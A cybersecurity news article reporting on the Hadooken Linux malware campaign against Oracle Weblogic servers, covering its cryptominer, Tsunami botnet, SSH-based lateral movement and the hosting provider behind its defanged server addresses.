A New Campaign of Linux Malware Exploits Oracle Weblogic for Cryptocurrency Mining
A new campaign of malware aimed at Linux systems has been discovered by cybersecurity researchers. Its primary objective is to mine digital currency illicitly.
The attack specifically targets the Oracle Weblogic server and aims to distribute a malicious software named Hadooken, as stated by the cybersecurity company Aqua.
“Upon execution of Hadooken, it installs a Tsunami malware and deploys a cryptocurrency miner,” stated security analyst Assaf Moran in a recent statement.
The breach pathways capitalize on well-known security flaws and misconfigurations, such as vulnerable login details, to establish an initial presence and run unauthorized commands on vulnerable platforms.
This operation includes the simultaneous activation of two similar payloads, one coded in Python and the other as a shell script. These payloads are tasked with fetching the Hadooken malware from an external server (“89.185.85[.]102” or “185.174.136[.]204“).
“Additionally, the shell script variant scans through various folders containing SSH data (like user passwords, host specifics, and confidential data) and leverages this data to target vulnerable servers,” emphasized Morag.
“Subsequently, it moves horizontally throughout the organization or interconnected environments to further extend the reach of the Hadooken malware.”
Hadooken features two integral elements – a virtual currency miner and a network of denial-of-service bots named Tsunami (also known as Kaiten), which has a track record of targeting Jenkins and Weblogic infrastructures within Kubernetes clusters.
Moreover, the malware ensures continual presence on the system by creating cron tasks to run the cryptocurrency miner at different intervals.
Aqua highlighted that the IP address 89.185.85[.]102 is associated with Aeza International LTD (AS210644) based in Germany, with a preceding study by Uptycs in February 2024 connecting it to an 8220 Gang cryptocurrency offensive through exploiting vulnerabilities in Apache Log4j and Atlassian Confluence Server and Data Center.
The second IP address 185.174.136[.]204, currently inactive, is also associated with Aeza Group Ltd. (AS216246). As discussed in a post from July 2024 by Qurium and EU DisinfoLab, Aeza operates as a provider of uncensorable hosting services with servers in Moscow M9 and two data centers in Frankfurt.
“The operational methods of Aeza and its rapid expansion can be attributed to their recruitment of young programmers linked to uncensorable hosting providers in Russia that provide protection for cyber crimes,” stated the researchers in their report.
About Author
